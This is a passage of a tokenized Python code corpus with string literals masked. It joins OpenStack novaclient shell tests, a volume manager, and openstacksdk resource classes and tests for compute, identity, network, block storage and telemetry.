'<STR_LIT>' ) <EOL> def test_volume_attach ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_volume_attach_without_device ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : <EOL> { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_volume_update ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_volume_detach ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> def test_instance_action_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_instance_action_get ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , <EOL> '<STR_LIT>' ) <EOL> def test_cell_show ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_cell_capacities_with_cell_name ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_cell_capacities_without_cell_name ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_migration_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_migration_list_v223 ( self ) : <EOL> self . run_command ( '<STR_LIT>' , api_version = "<STR_LIT>" ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_migration_list_with_filters ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_ssh ( self , mock_system , mock_find_server ) : <EOL> class FakeResources ( object ) : <EOL> addresses = { <EOL> "<STR_LIT>" : [ <EOL> { '<STR_LIT:version>' : <NUM_LIT:4> , '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : '<STR_LIT>' } , <EOL> { '<STR_LIT:version>' : <NUM_LIT:4> , '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : '<STR_LIT>' } , <EOL> { '<STR_LIT:version>' : <NUM_LIT:6> , '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : '<STR_LIT>' } , <EOL> { '<STR_LIT:version>' : <NUM_LIT:6> , '<STR_LIT>' : "<STR_LIT>" } <EOL> ] <EOL> } <EOL> mock_find_server . return_value = FakeResources ( ) <EOL> self . run_command ( "<STR_LIT>" ) <EOL> mock_system . assert_called_with ( "<STR_LIT>" ) <EOL> self . run_command ( "<STR_LIT>" ) <EOL> mock_system . assert_called_with ( "<STR_LIT>" ) <EOL> self . run_command ( "<STR_LIT>" ) <EOL> mock_system . assert_called_with ( "<STR_LIT>" ) <EOL> self . run_command ( "<STR_LIT>" ) <EOL> mock_system . assert_called_with ( "<STR_LIT>" ) <EOL> self . run_command ( "<STR_LIT>" ) <EOL> mock_system . assert_called_with ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . run_command ( "<STR_LIT>" ) <EOL> mock_system . assert_called_with ( "<STR_LIT>" ) <EOL> self . run_command ( "<STR_LIT>" ) <EOL> mock_system . assert_called_with ( "<STR_LIT>" ) <EOL> self . run_command ( "<STR_LIT>" ) <EOL> mock_system . assert_called_with ( "<STR_LIT>" ) <EOL> self . run_command ( "<STR_LIT>" ) <EOL> mock_system . assert_called_with ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . run_command ( "<STR_LIT>" ) <EOL> mock_system . assert_called_with ( "<STR_LIT>" ) <EOL> self . run_command ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> mock_system . assert_called_with ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . run_command ( "<STR_LIT>" ) <EOL> mock_system . assert_called_with ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_ssh_multinet ( self , mock_system , mock_find_server ) : <EOL> class FakeResources ( object ) : <EOL> addresses = { <EOL> "<STR_LIT>" : [ <EOL> { '<STR_LIT:version>' : <NUM_LIT:4> , '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : '<STR_LIT>' } , <EOL> { '<STR_LIT:version>' : <NUM_LIT:4> , '<STR_LIT>' : "<STR_LIT>" } , <EOL> { '<STR_LIT:version>' : <NUM_LIT:6> , '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : '<STR_LIT>' } <EOL> ] , <EOL> "<STR_LIT>" : [ <EOL> { '<STR_LIT:version>' : <NUM_LIT:4> , '<STR_LIT>' : "<STR_LIT>" } , <EOL> { '<STR_LIT:version>' : <NUM_LIT:6> , '<STR_LIT>' : "<STR_LIT>" } <EOL> ] <EOL> } <EOL> mock_find_server . return_value = FakeResources ( ) <EOL> self . run_command ( "<STR_LIT>" ) <EOL> mock_system . assert_called_with ( "<STR_LIT>" ) <EOL> self . run_command ( "<STR_LIT>" ) <EOL> mock_system . assert_called_with ( "<STR_LIT>" ) <EOL> self . assertRaises ( exceptions . ResourceNotFound , <EOL> self . run_command , <EOL> "<STR_LIT>" ) <EOL> def _check_keypair_add ( self , expected_key_type = None , extra_args = '<STR_LIT>' , <EOL> api_version = None ) : <EOL> self . run_command ( "<STR_LIT>" % extra_args , <EOL> api_version = api_version ) <EOL> expected_body = { "<STR_LIT>" : { "<STR_LIT:name>" : "<STR_LIT:test>" } } <EOL> if expected_key_type : <EOL> expected_body [ "<STR_LIT>" ] [ "<STR_LIT:type>" ] = expected_key_type <EOL> self . assert_called ( "<STR_LIT:POST>" , "<STR_LIT>" , expected_body ) <EOL> def test_keypair_add_v20 ( self ) : <EOL> self . _check_keypair_add ( api_version = "<STR_LIT>" ) <EOL> def test_keypair_add_v22 ( self ) : <EOL> self . _check_keypair_add ( '<STR_LIT>' , api_version = "<STR_LIT>" ) <EOL> def test_keypair_add_ssh ( self ) : <EOL> self . _check_keypair_add ( '<STR_LIT>' , '<STR_LIT>' , api_version = "<STR_LIT>" ) <EOL> def test_keypair_add_ssh_x509 ( self ) : <EOL> self . _check_keypair_add ( '<STR_LIT>' , '<STR_LIT>' , api_version = "<STR_LIT>" ) <EOL> def _check_keypair_import ( self , expected_key_type = None , extra_args = '<STR_LIT>' , <EOL> api_version = None ) : <EOL> with mock . patch . object ( builtins , '<STR_LIT>' , <EOL> mock . mock_open ( read_data = '<STR_LIT>' ) ) : <EOL> self . run_command ( '<STR_LIT>' % <EOL> extra_args , api_version = api_version ) <EOL> expected_body = { "<STR_LIT>" : { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT:test>' } } <EOL> if expected_key_type : <EOL> expected_body [ "<STR_LIT>" ] [ "<STR_LIT:type>" ] = expected_key_type <EOL> self . assert_called ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , expected_body ) <EOL> def test_keypair_import_v20 ( self ) : <EOL> self . _check_keypair_import ( api_version = "<STR_LIT>" ) <EOL> def test_keypair_import_v22 ( self ) : <EOL> self . _check_keypair_import ( '<STR_LIT>' , api_version = "<STR_LIT>" ) <EOL> def test_keypair_import_ssh ( self ) : <EOL> self . _check_keypair_import ( '<STR_LIT>' , '<STR_LIT>' , api_version = "<STR_LIT>" ) <EOL> def test_keypair_import_x509 ( self ) : <EOL> self . _check_keypair_import ( '<STR_LIT>' , '<STR_LIT>' , <EOL> api_version = "<STR_LIT>" ) <EOL> def test_keypair_stdin ( self ) : <EOL> with mock . patch ( '<STR_LIT>' , six . StringIO ( '<STR_LIT>' ) ) : <EOL> self . run_command ( '<STR_LIT>' , api_version = "<STR_LIT>" ) <EOL> self . assert_called ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , { <EOL> '<STR_LIT>' : <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:name>' : '<STR_LIT:test>' , <EOL> '<STR_LIT:type>' : '<STR_LIT>' } } ) <EOL> def test_keypair_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_keypair_show ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_keypair_delete ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_create_server_group ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] } } ) <EOL> def test_delete_multi_server_groups ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , pos = - <NUM_LIT:2> ) <EOL> def test_list_server_group ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_list_server_group_with_all_projects ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_list_server_os_virtual_interfaces ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_versions ( self ) : <EOL> exclusions = set ( [ <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:3> , <EOL> <NUM_LIT:5> , <EOL> <NUM_LIT:7> , <EOL> <NUM_LIT:9> , <EOL> <NUM_LIT:15> , <EOL> <NUM_LIT:16> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT:20> , <EOL> ] ) <EOL> versions_supported = set ( range ( <NUM_LIT:0> , <EOL> novaclient . API_MAX_VERSION . ver_minor + <NUM_LIT:1> ) ) <EOL> versions_covered = set ( ) <EOL> for key , values in api_versions . _SUBSTITUTIONS . items ( ) : <EOL> for value in values : <EOL> if value . start_version . ver_major == <NUM_LIT:2> : <EOL> versions_covered . add ( value . start_version . ver_minor ) <EOL> versions_not_covered = versions_supported - versions_covered <EOL> unaccounted_for = versions_not_covered - exclusions <EOL> failure_msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % sorted ( unaccounted_for ) ) <EOL> self . assertEqual ( set ( [ ] ) , unaccounted_for , failure_msg ) <EOL> def test_list_v2_10 ( self ) : <EOL> self . run_command ( '<STR_LIT:list>' , api_version = '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> class ShellWithSessionClientTest ( ShellTest ) : <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( ShellWithSessionClientTest , self ) . setUp ( ) <EOL> self . useFixture ( fixtures . MonkeyPatch ( <EOL> '<STR_LIT>' , <EOL> lambda * args , ** kwargs : fakes . FakeSessionClient ( * args , ** kwargs ) ) ) <EOL> class GetSecgroupTest ( utils . TestCase ) : <EOL> def test_with_integer ( self ) : <EOL> cs = mock . Mock ( ** { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] , <EOL> } ) <EOL> result = novaclient . v2 . shell . _get_secgroup ( cs , '<STR_LIT:1>' ) <EOL> self . assertEqual ( '<STR_LIT>' , result ) <EOL> cs . security_groups . get . assert_called_once_with ( '<STR_LIT:1>' ) <EOL> def test_with_uuid ( self ) : <EOL> cs = mock . Mock ( ** { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] , <EOL> } ) <EOL> result = novaclient . v2 . shell . _get_secgroup ( <EOL> cs , '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , result ) <EOL> cs . security_groups . get . assert_called_once_with ( <EOL> '<STR_LIT>' ) <EOL> def test_with_an_nonexisting_name ( self ) : <EOL> cs = mock . Mock ( ** { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] , <EOL> } ) <EOL> self . assertRaises ( exceptions . CommandError , <EOL> novaclient . v2 . shell . _get_secgroup , <EOL> cs , <EOL> '<STR_LIT:abc>' ) <EOL> def test_with_non_unique_name ( self ) : <EOL> group_one = mock . MagicMock ( ) <EOL> group_one . name = '<STR_LIT>' <EOL> cs = mock . Mock ( ** { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ group_one , group_one ] , <EOL> } ) <EOL> self . assertRaises ( exceptions . NoUniqueMatch , <EOL> novaclient . v2 . shell . _get_secgroup , <EOL> cs , <EOL> '<STR_LIT>' ) <EOL> class GetFirstEndpointTest ( utils . TestCase ) : <EOL> def test_only_one_endpoint ( self ) : <EOL> endpoint = { "<STR_LIT:url>" : "<STR_LIT:test>" } <EOL> result = novaclient . v2 . shell . _get_first_endpoint ( [ endpoint ] , "<STR_LIT>" ) <EOL> self . assertEqual ( endpoint , result ) <EOL> def test_multiple_endpoints ( self ) : <EOL> endpoints = [ <EOL> { "<STR_LIT>" : "<STR_LIT>" } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT:1> } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT:2> } <EOL> ] <EOL> result = novaclient . v2 . shell . _get_first_endpoint ( endpoints , "<STR_LIT>" ) <EOL> self . assertEqual ( endpoints [ <NUM_LIT:1> ] , result ) <EOL> def test_multiple_endpoints_but_none_suitable ( self ) : <EOL> endpoints = [ <EOL> { "<STR_LIT>" : "<STR_LIT>" } , <EOL> { "<STR_LIT>" : "<STR_LIT>" } , <EOL> { "<STR_LIT>" : "<STR_LIT>" } <EOL> ] <EOL> self . assertRaises ( LookupError , <EOL> novaclient . v2 . shell . _get_first_endpoint , <EOL> endpoints , "<STR_LIT>" ) <EOL> def test_no_endpoints ( self ) : <EOL> self . assertRaises ( LookupError , <EOL> novaclient . v2 . shell . _get_first_endpoint , <EOL> [ ] , "<STR_LIT>" ) <EOL> class PollForStatusTestCase ( utils . TestCase ) : <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> def test_simple_usage ( self , mock_time ) : <EOL> poll_period = <NUM_LIT:3> <EOL> some_id = "<STR_LIT>" <EOL> updated_objects = ( <EOL> base . Resource ( None , info = { "<STR_LIT>" : "<STR_LIT>" } ) , <EOL> base . Resource ( None , info = { "<STR_LIT>" : "<STR_LIT:OK>" } ) ) <EOL> poll_fn = mock . MagicMock ( side_effect = updated_objects ) <EOL> novaclient . v2 . shell . _poll_for_status ( <EOL> poll_fn = poll_fn , <EOL> obj_id = some_id , <EOL> status_field = "<STR_LIT>" , <EOL> final_ok_states = [ "<STR_LIT>" ] , <EOL> poll_period = poll_period , <EOL> action = "<STR_LIT>" , <EOL> silent = True , <EOL> show_progress = False <EOL> ) <EOL> self . assertEqual ( [ mock . call ( poll_period ) ] , <EOL> mock_time . sleep . call_args_list ) <EOL> self . assertEqual ( [ mock . call ( some_id ) ] * <NUM_LIT:2> , poll_fn . call_args_list ) <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> def test_print_progress ( self , mock_time , mock_stdout ) : <EOL> updated_objects = ( <EOL> base . Resource ( None , info = { "<STR_LIT:status>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT:0> } ) , <EOL> base . Resource ( None , info = { "<STR_LIT:status>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT:50> } ) , <EOL> base . Resource ( None , info = { "<STR_LIT:status>" : "<STR_LIT:OK>" , "<STR_LIT>" : <NUM_LIT:100> } ) ) <EOL> poll_fn = mock . MagicMock ( side_effect = updated_objects ) <EOL> action = "<STR_LIT>" <EOL> novaclient . v2 . shell . _poll_for_status ( <EOL> poll_fn = poll_fn , <EOL> obj_id = "<STR_LIT>" , <EOL> final_ok_states = [ "<STR_LIT>" ] , <EOL> poll_period = "<STR_LIT:3>" , <EOL> action = action , <EOL> show_progress = True , <EOL> silent = False ) <EOL> stdout_arg_list = [ <EOL> mock . call ( "<STR_LIT:\n>" ) , <EOL> mock . call ( "<STR_LIT>" % action ) , <EOL> mock . call ( "<STR_LIT>" % action ) , <EOL> mock . call ( "<STR_LIT>" % action ) , <EOL> mock . call ( "<STR_LIT>" ) , <EOL> mock . call ( "<STR_LIT:\n>" ) ] <EOL> self . assertEqual ( <EOL> stdout_arg_list , <EOL> mock_stdout . write . call_args_list <EOL> ) <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> def test_error_state ( self , mock_time ) : <EOL> fault_msg = "<STR_LIT>" <EOL> updated_objects = ( <EOL> base . Resource ( None , info = { "<STR_LIT:status>" : "<STR_LIT:error>" , <EOL> "<STR_LIT>" : { "<STR_LIT:message>" : fault_msg } } ) , <EOL> base . Resource ( None , info = { "<STR_LIT:status>" : "<STR_LIT:error>" } ) ) <EOL> poll_fn = mock . MagicMock ( side_effect = updated_objects ) <EOL> action = "<STR_LIT>" <EOL> self . assertRaises ( exceptions . ResourceInErrorState , <EOL> novaclient . v2 . shell . _poll_for_status , <EOL> poll_fn = poll_fn , <EOL> obj_id = "<STR_LIT>" , <EOL> final_ok_states = [ "<STR_LIT>" ] , <EOL> poll_period = "<STR_LIT:3>" , <EOL> action = action , <EOL> show_progress = True , <EOL> silent = False ) <EOL> self . assertRaises ( exceptions . ResourceInErrorState , <EOL> novaclient . v2 . shell . _poll_for_status , <EOL> poll_fn = poll_fn , <EOL> obj_id = "<STR_LIT>" , <EOL> final_ok_states = [ "<STR_LIT>" ] , <EOL> poll_period = "<STR_LIT:3>" , <EOL> action = action , <EOL> show_progress = True , <EOL> silent = False ) </s>
<s> """<STR_LIT>""" <EOL> from novaclient import base <EOL> class Volume ( base . Resource ) : <EOL> """<STR_LIT>""" <EOL> NAME_ATTR = '<STR_LIT>' <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % self . id <EOL> class VolumeManager ( base . Manager ) : <EOL> """<STR_LIT>""" <EOL> resource_class = Volume <EOL> def create_server_volume ( self , server_id , volume_id , device = None ) : <EOL> """<STR_LIT>""" <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : volume_id } } <EOL> if device is not None : <EOL> body [ '<STR_LIT>' ] [ '<STR_LIT>' ] = device <EOL> return self . _create ( "<STR_LIT>" % server_id , <EOL> body , "<STR_LIT>" ) <EOL> def update_server_volume ( self , server_id , attachment_id , new_volume_id ) : <EOL> """<STR_LIT>""" <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : new_volume_id } } <EOL> return self . _update ( "<STR_LIT>" % <EOL> ( server_id , attachment_id , ) , <EOL> body , "<STR_LIT>" ) <EOL> def get_server_volume ( self , server_id , attachment_id ) : <EOL> """<STR_LIT>""" <EOL> return self . _get ( "<STR_LIT>" % ( server_id , <EOL> attachment_id , ) , "<STR_LIT>" ) <EOL> def get_server_volumes ( self , server_id ) : <EOL> """<STR_LIT>""" <EOL> return self . _list ( "<STR_LIT>" % server_id , <EOL> "<STR_LIT>" ) <EOL> def delete_server_volume ( self , server_id , attachment_id ) : <EOL> """<STR_LIT>""" <EOL> return self . _delete ( "<STR_LIT>" % <EOL> ( server_id , attachment_id , ) ) </s>
<s> from openstack import service_filter <EOL> class ClusterService ( service_filter . ServiceFilter ) : <EOL> """<STR_LIT>""" <EOL> valid_versions = [ service_filter . ValidVersion ( '<STR_LIT>' ) ] <EOL> UNVERSIONED = None <EOL> def __init__ ( self , version = None ) : <EOL> """<STR_LIT>""" <EOL> super ( ClusterService , self ) . __init__ ( <EOL> service_type = '<STR_LIT>' , <EOL> version = version <EOL> ) </s>
<s> import six <EOL> from openstack . compute import compute_service <EOL> from openstack import resource <EOL> class ServerIP ( resource . Resource ) : <EOL> id_attribute = '<STR_LIT>' <EOL> resource_key = '<STR_LIT>' <EOL> resources_key = '<STR_LIT>' <EOL> base_path = '<STR_LIT>' <EOL> service = compute_service . ComputeService ( ) <EOL> allow_list = True <EOL> addr = resource . prop ( '<STR_LIT>' ) <EOL> network_label = resource . prop ( '<STR_LIT>' ) <EOL> server_id = resource . prop ( '<STR_LIT>' ) <EOL> version = resource . prop ( '<STR_LIT:version>' ) <EOL> @ classmethod <EOL> def list ( cls , session , path_args = None , ** params ) : <EOL> url = cls . _get_url ( path_args ) <EOL> resp = session . get ( url , endpoint_filter = cls . service , params = params ) <EOL> resp = resp . json ( ) <EOL> ray = [ ] <EOL> for network_label , addresses in six . iteritems ( resp [ '<STR_LIT>' ] ) : <EOL> for address in addresses : <EOL> record = { <EOL> '<STR_LIT>' : path_args [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : network_label , <EOL> '<STR_LIT:version>' : address [ '<STR_LIT:version>' ] , <EOL> '<STR_LIT>' : address [ '<STR_LIT>' ] , <EOL> } <EOL> ray . append ( cls . existing ( ** record ) ) <EOL> return ray </s>
<s> from openstack . identity import identity_service <EOL> from openstack import resource <EOL> class Version ( resource . Resource ) : <EOL> resource_key = '<STR_LIT:version>' <EOL> resources_key = '<STR_LIT>' <EOL> base_path = '<STR_LIT:/>' <EOL> service = identity_service . IdentityService ( <EOL> version = identity_service . IdentityService . UNVERSIONED <EOL> ) <EOL> allow_list = True <EOL> media_types = resource . prop ( '<STR_LIT>' ) <EOL> status = resource . prop ( '<STR_LIT:status>' ) <EOL> updated = resource . prop ( '<STR_LIT>' ) <EOL> @ classmethod <EOL> def list ( cls , session , ** params ) : <EOL> resp = session . get ( cls . base_path , endpoint_filter = cls . service , <EOL> params = params ) <EOL> resp = resp . json ( ) <EOL> for data in resp [ cls . resources_key ] [ '<STR_LIT>' ] : <EOL> yield cls . existing ( ** data ) </s>
<s> from openstack . network import network_service <EOL> from openstack import resource <EOL> class AddressScope ( resource . Resource ) : <EOL> resource_key = '<STR_LIT>' <EOL> resources_key = '<STR_LIT>' <EOL> base_path = '<STR_LIT>' <EOL> service = network_service . NetworkService ( ) <EOL> allow_create = True <EOL> allow_retrieve = True <EOL> allow_update = True <EOL> allow_delete = True <EOL> allow_list = True <EOL> name = resource . prop ( '<STR_LIT:name>' ) <EOL> project_id = resource . prop ( '<STR_LIT>' ) <EOL> ip_version = resource . prop ( '<STR_LIT>' , type = int ) <EOL> is_shared = resource . prop ( '<STR_LIT>' , type = bool ) </s>
<s> from openstack import service_filter <EOL> class OrchestrationService ( service_filter . ServiceFilter ) : <EOL> """<STR_LIT>""" <EOL> valid_versions = [ service_filter . ValidVersion ( '<STR_LIT>' ) ] <EOL> def __init__ ( self , version = None ) : <EOL> """<STR_LIT>""" <EOL> super ( OrchestrationService , self ) . __init__ ( <EOL> service_type = '<STR_LIT>' , <EOL> version = version <EOL> ) </s>
<s> import uuid <EOL> from openstack . block_store . v2 import volume as _volume <EOL> from openstack . tests . functional import base <EOL> class TestVolume ( base . BaseFunctionalTest ) : <EOL> VOLUME_NAME = uuid . uuid4 ( ) . hex <EOL> VOLUME_ID = None <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> super ( TestVolume , cls ) . setUpClass ( ) <EOL> volume = cls . conn . block_store . create_volume ( <EOL> name = cls . VOLUME_NAME , <EOL> size = <NUM_LIT:1> ) <EOL> cls . conn . block_store . wait_for_status ( volume , <EOL> status = '<STR_LIT>' , <EOL> failures = [ '<STR_LIT:error>' ] , <EOL> interval = <NUM_LIT:2> , <EOL> wait = <NUM_LIT> ) <EOL> assert isinstance ( volume , _volume . Volume ) <EOL> cls . assertIs ( cls . VOLUME_NAME , volume . name ) <EOL> cls . VOLUME_ID = volume . id <EOL> @ classmethod <EOL> def tearDownClass ( cls ) : <EOL> sot = cls . conn . block_store . delete_volume ( cls . VOLUME_ID , <EOL> ignore_missing = False ) <EOL> cls . assertIs ( None , sot ) <EOL> def test_get ( self ) : <EOL> sot = self . conn . block_store . get_volume ( self . VOLUME_ID ) <EOL> self . assertEqual ( self . VOLUME_NAME , sot . name ) </s>
<s> import unittest <EOL> import uuid <EOL> from openstack . tests . functional import base <EOL> @ unittest . skip ( "<STR_LIT>" ) <EOL> @ unittest . skipUnless ( base . service_exists ( service_type = "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> class TestAlarmChange ( base . BaseFunctionalTest ) : <EOL> NAME = uuid . uuid4 ( ) . hex <EOL> alarm = None <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> super ( TestAlarmChange , cls ) . setUpClass ( ) <EOL> meter = next ( cls . conn . telemetry . meters ( ) ) <EOL> alarm = cls . conn . telemetry . create_alarm ( <EOL> name = cls . NAME , <EOL> type = '<STR_LIT>' , <EOL> threshold_rule = { <EOL> '<STR_LIT>' : meter . name , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } , <EOL> ) <EOL> cls . alarm = alarm <EOL> @ classmethod <EOL> def tearDownClass ( cls ) : <EOL> cls . conn . telemetry . delete_alarm ( cls . alarm , ignore_missing = False ) <EOL> def test_list ( self ) : <EOL> change = next ( self . conn . telemetry . alarm_changes ( self . alarm ) ) <EOL> self . assertEqual ( self . alarm . id , change . alarm_id ) <EOL> self . assertEqual ( '<STR_LIT>' , change . type ) </s>
<s> import datetime <EOL> import testtools <EOL> from openstack . compute . v2 import extension <EOL> IDENTIFIER = '<STR_LIT>' <EOL> EXAMPLE = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:description>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT:name>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT:5>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> class TestExtension ( testtools . TestCase ) : <EOL> def test_basic ( self ) : <EOL> sot = extension . Extension ( ) <EOL> self . assertEqual ( '<STR_LIT>' , sot . resource_key ) <EOL> self . assertEqual ( '<STR_LIT>' , sot . resources_key ) <EOL> self . assertEqual ( '<STR_LIT>' , sot . base_path ) <EOL> self . assertEqual ( '<STR_LIT>' , sot . service . service_type ) <EOL> self . assertFalse ( sot . allow_create ) <EOL> self . assertTrue ( sot . allow_retrieve ) <EOL> self . assertFalse ( sot . allow_update ) <EOL> self . assertFalse ( sot . allow_delete ) <EOL> self . assertTrue ( sot . allow_list ) <EOL> def test_make_it ( self ) : <EOL> sot = extension . Extension ( EXAMPLE ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT>' ] , sot . id ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT>' ] , sot . alias ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT:description>' ] , sot . description ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT>' ] , sot . links ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT:name>' ] , sot . name ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT>' ] , sot . namespace ) <EOL> dt = datetime . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:9> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) . replace ( <EOL> tzinfo = None ) <EOL> self . assertEqual ( dt , sot . updated_at . replace ( tzinfo = None ) ) </s>
<s> import testtools <EOL> from openstack . identity . v3 import endpoint <EOL> IDENTIFIER = '<STR_LIT>' <EOL> EXAMPLE = { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:id>' : IDENTIFIER , <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT:5>' , <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> } <EOL> class TestEndpoint ( testtools . TestCase ) : <EOL> def test_basic ( self ) : <EOL> sot = endpoint . Endpoint ( ) <EOL> self . assertEqual ( '<STR_LIT>' , sot . resource_key ) <EOL> self . assertEqual ( '<STR_LIT>' , sot . resources_key ) <EOL> self . assertEqual ( '<STR_LIT>' , sot . base_path ) <EOL> self . assertEqual ( '<STR_LIT>' , sot . service . service_type ) <EOL> self . assertTrue ( sot . allow_create ) <EOL> self . assertTrue ( sot . allow_retrieve ) <EOL> self . assertTrue ( sot . allow_update ) <EOL> self . assertTrue ( sot . allow_delete ) <EOL> self . assertTrue ( sot . allow_list ) <EOL> def test_make_it ( self ) : <EOL> sot = endpoint . Endpoint ( EXAMPLE ) <EOL> self . assertTrue ( sot . is_enabled ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT:id>' 